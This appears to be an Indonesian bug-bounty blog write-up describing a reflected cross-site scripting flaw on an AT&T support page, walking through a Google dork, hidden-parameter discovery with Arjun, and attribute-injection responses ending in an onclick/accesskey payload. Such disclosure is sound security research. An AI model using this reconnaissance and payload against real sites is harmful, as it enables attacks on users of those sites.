Hacktivity

Reflected XSS on AT&T

Yang pertama saya menggunakan google dork dibawah ini

site:att.com ext:jsp

Dan saya mendapatkan URL:

https://www.att.com/esupport/serviceInterstitial.jsp

Saya mulai menggunakan Arjun untuk mencari parameter tersembunyi pada halaman tersebut

Dan saya menemukan salah satu parameter unik karena value dari parameter tersebut tidak didalam kutipan ganda (“) tetapi di dalam "
Request:

Response:

  • <meta name=&quot;WT.mc_id&quot; content=&quot;test&quot;>

Lalu saya mencoba membuat atribut HTML baru dengan menambah spasi,
Request:

Response:

  • <meta name=&quot;WT.mc_id&quot; content=&quot;test id=x&quot;>

Next step,

Request:

Response:

  • <meta name=&quot;WT.mc_id&quot; content=&quot;x onclick=confirm(document.domain) accesskey=x &quot;>

🔥🔥🔥

Avatar

Violets are blue

About Author

You may also like

Hacktivity

XSS 101

Apa itu XSS?Cross-site scripting (XSS) adalah kerentanan yang paling umum dalam aplikasi web dan memungkinkan Attacker untuk mengontrol browser korban
Hacktivity

Stored XSS on LaporBug.id

LaporBug.id adalah platform bug bounty dari indonesia, untuk informasi lebih lanjut tentang LaporBug.id kalian bisa membuka https://laporbug.id/. Saya berkeliling meliat setiap halaman LaporBug.id dan